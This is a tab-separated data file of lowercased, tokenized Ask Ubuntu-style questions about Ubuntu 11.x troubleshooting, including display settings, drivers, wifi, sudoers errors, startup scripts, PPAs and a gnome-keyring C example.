81044	how do i disable the orange resizing of windows when i put them up against the edge of the screen ?	ubuntu 11.10 with unity . how do i disable the orange resizing of windows when i put then up against the edge of the screen . -and instead move then to another workspace next that edge ? i have tried everything a could find in ccsm . -many things do n't work any more , are unity disabling them ?
81045	using start to run node application on startup	i have a problem with the node_module-path . can someone let me know what i 'm doing wrong ? running exec sudo -u www-data /usr/bin/node /etc/node/app.js gives me error : can not find module 'connect' i have this config ( /etc/init/applicationserver.conf ) : start on started mountall stop on shutdown respawn respawn limit 99 5 script export home= '' / '' export node_path= '' /usr/lib/node_modules '' exec sudo -u www-data /usr/bin/node /etc/node/app.js > > /var/log/applicationserver.log 2 > & 1 end script post-start script end script it seems like it ca n't find the modules installed . i 've verified that connect is under /usr/lib/node_modules and if i export node_path from root or my account it works fine .
81048	does gnome-character-map include any math symbols ?	i found gnome-character-map very useful application , when i need to construct simple math formula , it has greek letters , therefore i wanted to go further , does gnome-character-map have any other math symbols , `` great or equal '' , '' does n't equal '' for example ? thanks !
81051	`` no valid sudoers sources found , quitting '' error , how to fix it ?	at the time of running sudo command i got the following error : '' sudo : ca n't open /etc/sudoers.d/readme : permission denied /etc/sudoers : /etc/sudoers.d/readme near line 23 < < < sudo : parse error in /etc/sudoers near line 23 sudo : no valid sudoers sources found , quitting '' due to this error i ca n't use the sudo command please help me ...
81052	can i play internet radio that uses the .aspx format in ubuntu ?	i had read how to add internet radio in banshee : how can i add an internet radio station to banshee ? but i think it only can play the .pls not aspx . also how that possible to look the stream url of the radio like this : http : //91.121.122.94:8032 the radio that i try to add to the banshee : http : //radio.mediacorp.sg/radiolive/xfm963.aspx other than using ctrl-i in firefox , how to know the streaming url for the .aspx website ?
81060	irc client that automatically associates with irc uri	i know there are workarounds for opening irc links with xchat , but i 'm looking for clients that does this automatically . i 'm quite aware of chatzilla as well , but it has a certain limitation i 'm can not to entertain . preferably , those clients should meet the following criteria : dcc support gtk application , or anything that works in lxde without pulling too many dependencies
81061	what is this window overlay ?	after waking up from suspend , i see these half-transparent window handles , but i do n't know how to activate it . sometimes i can deactivate it by tapping the touchpad . what is the function of this ? how to activate it ?
81071	`` verr_suplib_world_writable '' error when trying to installing os in virtualbox	i wan na install os on virtualbox , but when i wan na to install it , it will return errors : failed to open a session for the virtual machine arch . failed to load vmmr0.r0 ( verr_suplib_world_writable ) . unknown error creating vm ( verr_suplib_world_writable ) . details : result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 515e8e8d-f932-4d8e-9f32-79a52aead882 } i 'm using ubuntu 11.04 . how should i solve it ?
81073	how to use finger print sensor ?	i am using ubuntu 11.10 on my aspire 5237g i am having finger print reader in built with touch-pad . i am not able to use that . if someone provide me package details and installation procedure . i am posting result of lsusb cmd can anyone suggest me what i have to do for using finger print sensor in ubuntu 11.10
81076	issue with text in a intel 82945g express chipset family	i am on ubuntu 11.04 and the text in all the applications often looks with visual artifacts . i have installed xserver-xorg-video-intel . attached a image so you can appreciate . lshw -c video output : *-display description : vga compatible controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : dfe00000-dfe7ffff ioport:8800 ( size=8 ) memory : e0000000-efffffff memory : dfe80000-dfebffff in the text selected in green you can see the 'online ' , 'file ' and 'hassle ' words cut .
81080	artec tv18r tuner not working	can somebody kindly help me setup my tv tuner stick ? make and model : artec tv18r usb tv tuner os : ubuntu 11.10 64bit hardware : msi ms1656-us ( gx640 barebones ) : i5 580m , 2xintel x25m ssds , radeon hd5850m , realtek sound . logs and messages : antillar @ antillar-ms-1656 : /usr/share/dvb/atsc $ [ b ] [ color=red ] sudo lsusb [ /color ] [ /b ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 003 : id ffc0:001f bus 002 device 005 : id 05d8:8117 ultima electronics corp. [ /code ] [ code ] antillar @ antillar-ms-1656 : /usr/share/dvb/atsc $ so , it seems that the tuner is being detected , but the light on it does not turn on ? not sure what is going on ? sudo lspci [ sudo ] password for antillar : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 01:00.0 vga compatible controller : ati technologies inc broadway pro [ mobility radeon hd 5800 series ] 01:00.1 audio device : ati technologies inc juniper hdmi audio [ radeon hd 5700 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 04:00.0 firewire ( ieee 1394 ) : jmicron technology corp. ieee 1394 host controller 04:00.1 system peripheral : jmicron technology corp. sd/mmc host controller 04:00.2 sd host controller : jmicron technology corp. standard sd host controller 04:00.3 system peripheral : jmicron technology corp. ms host controller 04:00.4 system peripheral : jmicron technology corp. xd host controller 05:00.0 network controller : intel corporation ultimate n wifi link 5300 ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) antillar @ antillar-ms-1656 : /usr/share/dvb/atsc $ i have been searching for a solution to this all weekend without any luck . i remember reading that ehci_hcd is the problem , but i 'm not sure if disabling it is a good idea . i do n't want my usb ports to go back to v1.1 .
81081	how to use glades actiongroup correctly ?	could someone give me an example how to use glade 's actiongroup with a gtk.builder in a vala-application ? if i have an actiongroup with an action save , and on this action i 've set the activate signal to `` on_save_clicked '' , should it be fine to write : [ ccode ( instance_pos = -1 ) ] public void on_save_clicked ( ) { print ( `` i would like to save , please\n '' ) ; } in global scope and then use builder.connect_signals ( null ) ? when i do this , i just get `` could not find signal handler 'on_save_clicked ' '' when executing the program . no compile errors . i 'm using valac -- pkg gtk+-3.0 test.vala for compiling and glade-3.10.0
81082	display turns off when watching videos ( then video starts to lag ) , how to fix it ?	okay , here 's the thing - - on my ubuntu 11.10 64-bit installation , i have the display set to turn off automatically after 3 minutes of inactivity . there are two problems now : the display turns off even when i am watching videos . but i do n't want to keep fiddling my mouse or keyboard when i am watching a movie . okay , like i said above , the display turns off , then i move the mouse a bit each time , and the display turns back on . but now , the video does n't play properly , it lags . a lot actually . are these issues common ? can these be fixed ?
81083	play youtube and play grooveshark	i need some help please . since i have used ubuntu i can not run any video . i downloaded the latest ubuntu oneiric and even downloaded the recommended adobe flash player and i am still stuck .
81088	bluetooth settings not clickable , how do i set it up ?	i am not able to enable disable bluetooth from system settings buttons are not clickable . i am not able to connect to bluetooth please help .
81092	how to configure nautilus to open a terminal	let us say i am viewing the /media/fun/videos/chucknorris folder in nautilus . how can i configure nautilus so by pressing a key it opens a terminal and this terminal defaults opened directory is the folder am viewing in nautilus ( in this case the chucknorris folder ) . so if i open the terminal it should show me am in the /media/fun/videos/chucknorris directory . note that the terminal window should not be embedded in nautilus , instead it should be another window .
81093	radeon x1550 problem	i 'm new to ubuntu and tried read some similar q & a without success . i have an old computer - athlon 3000 xp , motherboard gigabyte ga 7n 400 pro2 , ati radeon x1550 , 1.8 gb ram . istalled ubuntu 11.10 today and performance is not great . basically desktop effects are slow , and online videos freeze or are choppy . i 've tried sudo apt-get install fglrx command and it improved a bit , but when trying to get to catalyst i 'm getting following message : `` there was a problem initializing catalyst control center linux edition . it could be caused by the following . no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig '' anticonfig say that there 's no recognised device . please help
81097	re-installing default video driver ?	i am experiencing quite major problem with ubuntu 11.10 . here is what happened : i installed the closed source video driver suggested by ubuntu ( my graphics card is ati mobility radeon hd 560v ) . having installed the driver i restarted the computer , and after that some parts of the gnome ui did n't show up properly , wrong colors & unclear . i decided to remove the driver installed as everything had worked before installation , again rebooted my computer , but this time after showing the purple boot screen , whole screen turns black and nothing happens . i tried restart couple of times , same black screen instead of login screen . the recovery mode of ubuntu works so i can access terminal , only problem is that i do n't know what to do . anyone got any ideas ?
81103	how do i recover unity3d lost from compiz config change ?	i am a rank newbie switching from windows 7 . i ca n't stand some of the default unity behavior such as why are all my windows up in the top left corner ? with a large display that hurts my neck . so i looked online and i installed the compiz config thingy . great . now i have no desktop at all . just the menu bar at the top . i looked up how to uninstall and reinstall unity . all the instructions point to other problems ... even other operating systems ( windows ? ? ? from an ubuntu forum no less ) . can someone please tell me how to fix unity ? i do n't care about settings or anything . i just do n't want to reinstall ubuntu again .
81116	how do i remove a printer ?	i had problems with my hp deskjet d1360 in ubuntu 11.10 . to resolve the issue i downloaded the hplip from the hp website . by this a new printer entry was created , which works . unfortunately the broken entry is still there and is selected as default everytime i print . how to remove the broken entry ?
81117	rtl8192ce wifi driver issue	everyone , i am using ubuntu10.10 . my laptop is lenovo model t420 . i am not able to install it 's wifi driver.please tell me how can i install it 's wifi driver .
81123	i want to save apt-get package	i am using ubuntu 10.10 . suppose i run this command to install gcc : sudo apt-get install gcc* i want save gcc on my pc forever , so that next time i do not have to run that apt-get command to install it . how can i save it from its cache ? how can i find more ubuntu repositories to install more packages ?
81127	ubuntu one stuck on `` file sync starting '' on windows 8	when i first installed ubuntu one on my computer it worked fine and synced everything . but after i rebooted it refused to sync anything and is stuck on `` file sync starting '' . can anyone point out how to fix this ?
81129	how to open unity 's alt+f2 dialog when hitting top-right corner ?	i want to open the alt+f2 run dialog when i hit the top-right corner like in this answer , but i need another command to do it ( i have already installed xdotool and xmacro ) .
81133	how to set up static ip for dhcp server	i would like to set up a dhcp server on ubuntu 10.10 . how can i give it a static ip ? i know this question is not very specific -- i would like just you to point me in the right direction .
81138	is it safe to install kubuntu-desktop in 11.10 ?	has anyone noticed issues during and/or after the installation of kde desktop ? ( kubuntu-desktop ) sudo apt-get install kubuntu-desktop i already have gnome shell along with unity but want to add kde for testing purposes . i heard somewhere that in ubuntu 11.10 , it does not go smoothly .
81139	performance while on battery - ubuntu 11.10	first time on battery after installing ubuntu 11.10 . what i immediately notice is poor graphics performance and overall poor system responsiveness . if i plug in the power chord , it 's all good . i am aware of the `` battery drain '' issue , but i would n't think it would affect the overall performance on the system . laptop : dell latitude e6500 - 8gm ram . any ideas ? google did n't return any results i found relevant .
81144	how to get browser to open from same folder ?	i do n't know how to make the title any more clear . let me give an example - when i want to add an image to an article on my blog , i click `` browse '' button in the image uploader , and then upload the image to the blog . the problem is , when i want to upload another image to my blog , i want the browser to look into the same directory ; but it 's always takes me to the `` recently used '' directory . is there a way to change this ? i hope i have made myself clear enough . edit : this issue probably pertains to google chrome browser only . as you can see in the comments , it 's fine with mozilla firefox .
81146	ca n't save the config file turtlebot_node.py because i do n't own the file	i have installed turtlebot on my robot and also on the desktop . i am using the software on a 4xxx roomba . the baud rate is the same as the turtlebot . but , the port is not the same . i have tried and tried to edit the turtlebot_node.py configuration file and it will not let me save it . it says i do n't have permissions . when i try to change the permissions , it tells me that i am not the owner so i can not change the permission . this happens on both the netbook and the desktop . i am loss to what to do next . chmod and chown do not seem to work .
81147	endless login loop	when i try to log in , i get returned to the login screen . when checking the ~/.xsession-errors file i realized that it 's a libglib2.0 dependency i forgot to install when installing gtk , more specially the symbols in the libglib dbg file are not there because i forgot to install it , and on reboot and login the problem arose . however , no matter what package i install the problem persists which leads me to believe my suspicions are wrong . the line from the .xsession-errors file : /usr/bin.gnome-session : symbol lookup error : opt/gtk/lib/libgmodule-2.0.so.0 : undefined symbol : g_private_replace
81152	why do the escape and enter keys not always do the right thing in dialog boxes ?	why is it that when a dialog pops up , the escape key does n't always cancel it and the enter key does n't always press the default button ? should n't this be a standard across all dialog boxes in all applications ? i have gotten into the habit of pressing escape to cancel a dialog and enter to confirm it , but applications ( and especially kde , gnome and unity in many many cases ) seem to ignore my wishes . what is the problem ? is consitency too much to ask ?
81155	can i reorder an application search result ?	i want to open `` libreoffice calc '' and type in `` cal '' in the search bar . i can see calculator and libreoffice calc . now i could use cursor keys or mouse to select libreoffice calc . but this is not what i want ! what i want is to reorder the result ! i want to have libreoffice calc before calc , because this would be my preferred result ( i just have to press enter if libreoffice would be the first match ) . is that possible ? can i teach unity to show result a certain way ? launchy ( for windows ) e.g. , a keystroke launcher , can do that ! ( gnome-do also works ! ) do you have some tips for me ?
81156	wireless with wep extremely slow on an acer timeline 4810t with a centrino wireless-n 1000	i 've upgraded an acer timeline 4810t to ubuntu 11.10 . everything works fine except for the darn wireless interface ( network manager ) . i just tested the wireless interface over a non-encrypted signal and it works beautifully . the issue is definitely related to wep . unfortunately , some of the networks i need to connect to are wep encrypted , therefore this is a serious issue for me that is preventing me from using ubuntu on my laptop . this was no problem in 11.04 and prior . is there a simple solution for this ? any suggestions ? here 's more hardware information . hopefully this helps to debug the network issue : sudo lshw -class network *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:3c:5e : e0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-13-generic-pae firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:43 memory : d2400000-d2401fff lspci 02:00.0 network controller : intel corporation centrino wireless-n 1000 rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no many thanks for your help ! i just tested the wireless interface over a non-encrypted signal and it works beautifully . the issue is definitely related to wep . unfortunately , some of the networks i need to connect to are wep encrypted , therefore this is a serious issue for me that is preventing me from using ubuntu on my laptop . blacklisting acer-wmi module did n't have any noticeable effect and i reverted the change after testing . blacklist acer-wmi ======== the following fix , suggested by bruno , works : options iwlagn 11n_disable=1 i did not go any further and did not try the second option provided .
81160	packages do n't show up after adding ppa	i added ppa : ubuntu-mozilla-daily/ppa/firefox-aurora/ubuntu oneiric and ppa : banshee-team/ppa/ubuntu oneiric to my software sources , then did apt-get update . however , after selecting their specific sources from the menu in software center , the only packages available are language packs and extensions for banshee and firefox-aurora . i had already uninstalled banshee and firefox . if i try and install banshee/aurora with sudo apt-get it will install the old version . searching for banshee/aurora in software center only shows the old version . i 'm guessing the packages in the ppas conflict with the packages in the main sources . how do i install the newer versions ?
81161	how to remove session entries from lightdm ?	i recently added cairo dock to my gnome shell in 11.10 . cairo dock is great , but i 'm left with one little problem that i 'd like to fix : after installing cairo dock , lightdm includes two extraneous entries to non-working desktops . ( the entries to working desktops remain unaffected , so i guess i could just ignore the extraneous entries , but ... ) so i 'd like to remove/edit the extraneous entries in lightdm . i 've looked and looked for discussions on how to do so , but have n't had much luck . any suggestions on how to go about editing the login menu in 11.10 ?
81163	error 131:4 when running photoshop cs5 with wine ?	i installed photoshop cs5 following the instructions on winehq , but receive the 131:4 error with all of the cs5 programs . is there a workaround for this ?
81166	how do i get an application to appear as a choice in update-alternatives ?	i separately installed the firefox beta and alpha channels , and have desktop configuration files pointing to them in ~/.local/share/applications . however , stable firefox is being used as my default browser by the system . ( firefox beta used to be used until i messed with the `` default applications '' in system settings , where it is not listed . ) i tried running sudo update-alternatives -- config x-www-browser to manually change it , but it 's only recognizing chromium and firefox ( stable ) and showing them as a choice . what can i do to get custom desktop configuration files in ~/.local/share/applications to be seen as default alternatives ? i think i may have to fiddle with the desktop config files , or with mimeinfo.cache or mimeapps.list ? running oneiric . here is the content of the firefox-beta.desktop file i created : [ desktop entry ] name=firefox beta exec=firefox-beta -p beta -no-remote icon=firefox terminal=false x-multipleargs=false type=application startupnotify=true startupwmclass=firefox categories=gnome ; gtk ; network ; webbrowser ; comment [ en_us ] =firefox beta channel mimetype=text/html ; text/xml ; application/xhtml+xml ; application/xml ; application/vnd.mozilla.xul+xml ; application/rss+xml ; application/rdf+xml ; image/gif ; image/jpeg ; image/png ; x-scheme-handler/http ; x-scheme-handler/https ; x-scheme-handler/ftp ; x-scheme-handler/chrome ; video/webm ; name [ en_us ] =firefox beta [ newwindow shortcut group ] name=open a new window exec=firefox-beta -new-window about : blank targetenvironment=unity
81170	macbookpro 7,1 can only see one cpu	on a macbookpro 7,1 running ubuntu 11.10 , system monitor only sees 1 core ( instead of 2 ) . cat /proc/cpuinfo | grep 'cpu cores' also gives : cpu cores : 1 i followed this guide and added acpi_apic_instance=2 to the line with grub_cmdline_linux_default , but that does n't seem to change the situation . what can i do ? i 'm using refit , installed under macos , and running in dual boot with macos . after the refit menu , i 'm still presented with the grub menu ( i 'm assuming that 's normal ) . i saw similar posts on this matter , but could not fix my problem with what they suggested . edit : with the method mentioned above the computer runs sometimes with 1 core and other times with 2 . why is that ? how can it be fixed ?
81171	after reinstalling ati graphics drivers , my keyboard and mouse are n't working anymore	on ubuntu 11.04 i tried to install the open source drivers for my laptops ati mobility radeon 5470m but i messed that up a bit and lost xserver . now i 've managed to solve that problem with this and by downloading the ati proprietary drivers and install those manually . now , when ubuntu loads up i get to the login screen but i ca n't use my mouse or my keyboard ( usb keyboard and mouse does n't work either ) . if i use the recovery console , then login with that and then run 'startx ' . i can login fine ( though unity does n't show , the graphics seem to be working because it shows the fading animation of libnotify ) , but i ca n't type or move my mouse .
81174	how can i contribute to the libreoffice dictionary ?	i always add words to my libreoffice dictionary ( standard.dic ) , but i would love to make those words available to other users by contributing to the project 's dictionaries . is there a way libreoffice can produce statistics about how often a word is added in dictionaries from users wishing to help ? or is there a project i can join to participate in the dictionaries editing ?
81175	how can i always show the close , minimise and maximise buttons on their windows and keep global menus ?	first , this is not a duplicate of how can i always show the close , minimise & maximise buttons into their own windows ? - i would like to preserve global menus . is there a way to only always show the close , minimise and maximise buttons on every application ? the use case is as follows : i have a maximized application in the background , over it is a not-maximized application that has got focus . i want to close the maximized application . i move the pointer to upper left corner . the buttons do not show , since the background application does not have focus . i have to go back , click on it and then go back to the corner to close it . i do that several times a day : - ( .
81179	how to prevent apt-get/aptitude keeping a cache	i have installed apt-cacher ng to provide a cache of packages for several machines . i therefore see no point in having aptitude/apt-get keeping their own ( second ) cache in /var/cache/apt/archives . i realise i can empty this cache with sudo apt-get clean , but is there some way of configuring apt-get to automatically clean the cache when an install has completed ?
81183	why did ctrl-f stop working in libreoffice ?	i 've basically settled into unity , but one constant that is kind of giving me agita is that in libreoffice calc ( and writer ) ctrl-f does nothing . i can go to edit > find ... and the edit menu even suggests ctrl-f as a keyboard shortcut , but actually typing it does n't do anything . ctrl-alt-f works fine . the only thing that does n't work is ctrl-f . i had a really hard time getting settled with unity ( mostly trying to get my old gnome-do and compiz settings back ) so i spent a lot of time monkeying with the compiz settings manager . but i ca n't figure out where i would have unset/ overrode this . plus , it is n't like ctrl-f does something unexpected . it just does nothing .
81184	can not move screenlets in gnome shell	i have searched around and ca n't seem to find an answer . i have installed the 0.1.4 version of screenlets on ubuntu 11.10 running gnome shell , and everything functions okay except that i can not move them . i ca n't seem to find any documentation about this problem ; any help is appreciated !
81186	how do i install mythtv on a lenovo s12 with wireless ?	how do i install ubuntu 11.10 and mythtv client on my lenovo s12 ( intel atom ) laptop and use it using wifi ?
81188	password stopped working after upgrade to 11.10	we have been using ubuntu for over two years . every time we download an upgrade , our password has always kept working . after downloading 11.10 , the password quit working . we went to the community to get answers to retrieve . we followed the prompting to reset password and ran into problems . we made it to where it says to change the rw to ro . it gave us four lines for 11.10 . all four did not have a rw at the end of the line . then we got a message stating daemon had died . we can use the computer but can not update or change anything without the password . can anyone help us ? we have a compaq presario sr2170nx with a new hard drive . we had vista on the old hard drive and it died . when we bought new , we went with ubuntu and it works great for our needs except for itunes and this problem .
81193	how to set applications as the default view in gnome shell activities when there are no windows open ?	if there are no windows opened , it does n't make any sense to have the windows view as default when we go through activities .
81199	how to adjust webcam image on skype ?	my microsoft lifecam vx-2000 webcam works with skype and cheese , but the image is a little dark on skype . i adjust it on cheese but the changes do n't reflect in skype ( i think this was expected anyway ) . also during the installation of ubuntu when it prompts if i wan na take a picture with my webcam the image was crystal clear , in cheese and skype the image is a little curly . how i can adjust the image to make it look brighter and less curly , if possible ?
81202	will my microsoft os and programs still `` talk '' on the internet when i am using a livecd ?	will my microsoft operating system and programs still `` talk '' on the internet when i am using a livecd ? for example , will the microsoft operating system still talk to gain updates ? will office still check to see if it has a proper serial activation code ? is my os system details and registration still communicating to microsoft ?
81206	mythbuntu epg cron job not working	i 've got a problem with my epg grabber script 'shepherd ' for the australian epg . these two commands below work when i type it as user mythserver but when i put them in cron the first command creates a file of zero length : # collect data 18 13 * * * mythserver /usr/bin/tv_grab_au -- notimetest -- output /home/mythserver/.mythtv/farm2.xmltv # read in data 30 4 * * * mythserver /usr/bin/mythfilldatabase -- file 1 /home/mythserver/.mythtv/farm2.xmltv what am i missing here ?
81208	getting junk data while storing and accessing key	i need some directions on the following . please guide me through it : objective : to store and access file encryption keys for a given user . each file will have a separate encryption key . so , a user who wants to encrypt 10 files will have 10 different keys stored on the keyring . issue : i am facing two issues : 1 . getting junk data while storing and accessing keys 2 . callback function is not being called implementation : # include < stdio.h > # include < gnome-keyring-1/gnome-keyring.h > # include < gnome-keyring-1/gnome-keyring-memory.h > gnomekeyringpasswordschema my_schema = { gnome_keyring_item_generic_secret , { { `` user '' , gnome_keyring_attribute_type_string } , { `` file '' , gnome_keyring_attribute_type_string } , { null , 0 } } } ; void stored_password ( gnomekeyringresult res , gpointer user_data ) { printf ( `` debug : storedpass - bfr\n '' ) ; /* user_data will be the same as was passed to gnome_keyring_store_password ( ) */ if ( res == gnome_keyring_result_ok ) printf ( `` password saved successfully ! \n '' ) ; else printf ( `` could n't save password : % s '' , gnome_keyring_result_to_message ( res ) ) ; printf ( `` debug : storedpass - afr\n '' ) ; } void save_my_password ( ) { gnomekeyringresult res ; gpointer gp = null , gp2 = null ; printf ( `` debug : savemypass - bfr\n '' ) ; gp = gnome_keyring_store_password ( & my_schema , /* the password type */ gnome_keyring_default , /* where to save it */ `` my file encryption password '' , /* password description , displayed to user */ `` test1000 '' , /* the password itself */ stored_password , /* a function called when complete */ gp2 , null , /* user data for callback , and destroy notify */ /* attributes */ `` user '' , `` piyush '' , `` file '' , `` abc.txt '' , null ) ; /* always end with null */ printf ( `` debug : savemypass - afr\n '' ) ; g_assert ( gp ! = null ) ; printf ( `` % p % s\n '' , gp , ( char * ) gp ) ; } /* a callback called when the operation completes */ void found_password ( gnomekeyringresult res , const gchar* password , gpointer user_data ) { /* user_data will be the same as was passed to gnome_keyring_find_password ( ) */ printf ( `` debug : foundpass - bfr\n '' ) ; if ( res == gnome_keyring_result_ok ) printf ( `` password found was : % s\n '' , password ) ; else printf ( `` could n't find password : % s '' , gnome_keyring_result_to_message ( res ) ) ; /* once this function returns |password| will be freed */ printf ( `` debug : foundpass - afr\n '' ) ; } void find_my_password ( ) { printf ( `` debug : findmypass - bfr\n '' ) ; gpointer gp = gnome_keyring_find_password ( & my_schema , /* the password type */ found_password , /* a function called when complete */ null , null , /* user data for callback , and destroy notify */ /* attributes */ `` user '' , `` piyush '' , `` file '' , `` abc.txt '' , null ) ; /* always end with null */ printf ( `` debug : findmypass - afr\n '' ) ; g_assert ( gp ! = null ) ; printf ( `` % p % s\n '' , gp , ( char * ) gp ) ; } int main ( ) { save_my_password ( ) ; find_my_password ( ) ; } compile : gcc gnomekey.c -o gnomekey -lgnome-keyring pkg-config -- cflags -- libs gnome-keyring-1 output : ./gnomekey debug : savemypass - bfr debug : savemypass - afr 0x8676800 < junk-data > debug : findmypass - bfr debug : findmypass - afr 0x8676828 < junk-data >
81214	dell latitude e6520 overheating	i 'm a newcomer to ubuntu 11.10 . my laptop is a dell latitude e6520 , sandy bridge platform . the system cooling fan is crazy all the time . i do n't do any intensive tasks . i really hope my laptop does n't become a mushroom cloud . i suppose there 's no perfect way to solve this ... can i lower the cpu frequency ? jupiter 0.0.51 was installed ( power save mode ) . cooling worked in my windows 7 system until i deleted it . ( i wo n't go back to windows 7 . )
81215	terminal problems entering password	every time i try to enable shell theme extension or anything in general in terminal it asks me for a password but wo n't accept it .
81222	where does juju store a log of all commands run and their output for each unit ?	sometimes when deploying a service ( and more specifically a new unit ) for a juju charm , an error occurs and there seems to be no way of finding out exactly what it was . is there some sort of output log of all commands the unit ran ?
81224	guvcviewer - light frequency filter set default value `` 50hz '' not `` nofliker ''	after installing ubuntu 11.10 with noname video camera , video is always very dark . found the solution . installed guvcviewer and changed in settings paremeter - `` light frequency filter '' from nofliker to 50hz . unfortunately it has to be done after every restart . how to set it up permanently ? i think , this is a system parameter .
81226	custom php version when installing lamp	does anyone knows how do we force a php version to be installed when installing lamp via command line ? for example i want to php5.1 when installing lamp .
81228	accessing sqlite3 via php not working ?	my local web server on one machine running ubuntu 11.04 works fine using php5 to access sqlite3 - however on a new machine running ubuntu 11.10 the same code , same structure , does not work at all - even though phpinfo ( ) indicates all modules are enabled . any idea 's on how to solve this issue ? phpinfo ( ) on my ubuntu 11.04 machine indicates php version 5.3.5-1ubuntu7.3 but the newer ubuntu 11.10 only supports php version 5.3.6-13ubuntu3.2 ? why has it gone back to ubuntu3.2 ? the php code seems to be able open the database file ok , but fails when accessing a sqlite query in the code below ? $ result = $ db- > query ( 'select * from sysconfig ' ) ; $ data = $ result- > fetcharray ( sqlite_num ) ; the variable $ data returns null ( however it returns data on ubuntu 11.04 - ok ) frank
81231	dev driver install with linux kernel 3.0 fails	i tried install dev driver nvidia ( ubuntu 11.10 ) my /var/log/nvidia-installer.log : http : //pastebin.com/upzsg4au how to solve this problem ? nvidia-installer log file '/var/log/nvidia-installer.log' creation time : mon nov 21 12:42:03 2011 installer version : 270.41.19 path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/x11r6/bin option status : license pre-accepted : false update : false force update : false expert : false uninstall : false driver info : false precompiled interfaces : true no ncurses color : false query latest version : false no questions : false silent : false no recursion : false no backup : false kernel module only : false sanity : false add this kernel : false no runlevel check : false no network : false no abi note : false no rpms : false no kernel module : false force selinux : default no x server check : false no cc version check : false run distro scripts : true no nouveau check : false run nvidia-xconfig : false sigwinch work around : true force tls : ( not specified ) force compat32 tls : ( not specified ) x install prefix : ( not specified ) x library install path : ( not specified ) x module install path : ( not specified ) opengl install prefix : ( not specified ) opengl install libdir : ( not specified ) compat32 install chroot : ( not specified ) compat32 install prefix : ( not specified ) compat32 install libdir : ( not specified ) utility install prefix : ( not specified ) utility install libdir : ( not specified ) installer prefix : ( not specified ) doc install prefix : ( not specified ) kernel name : ( not specified ) kernel include path : ( not specified ) kernel source path : ( not specified ) kernel output path : ( not specified ) kernel install path : ( not specified ) precompiled kernel interfaces path : ( not specified ) precompiled kernel interfaces url : ( not specified ) proc mount point : /proc ui : ( not specified ) tmpdir : /tmp ftp mirror : ftp : //download.nvidia.com rpm file list : ( not specified ) selinux chcon type : ( not specified ) using : nvidia-installer ncurses user interface - > license accepted . - > installing nvidia driver version 270.41.19 . - > performing cc sanity check with cc= '' cc '' . - > performing cc version check with cc= '' cc '' . - > kernel source path : '/lib/modules/3.0.0-12-generic/build' - > kernel output path : '/lib/modules/3.0.0-12-generic/build' error : if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the `` kbuild_output '' or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent nvidia-installer command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent nvidia-installer command line option . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com .
81233	application switcher on both monitors in dual-head setup ?	i have a dual-head setup , and everything is working fine , but i would like the application switcher window to show up in both monitors at the same time when i switch applications . is that possible to set up somehow ? i did n't find anything in ccsm . i 'm using the static application switcher right now , but i would use a different switcher if it has that feature .
81235	what happens if i force power off my pc	shutdown did n't work for me . it was stuck at ubuntu logo . i waited for sometime and finally powered off mu laptop . i want to know what happens if i power off my laptop . in what ways its harms os and/or hardware .
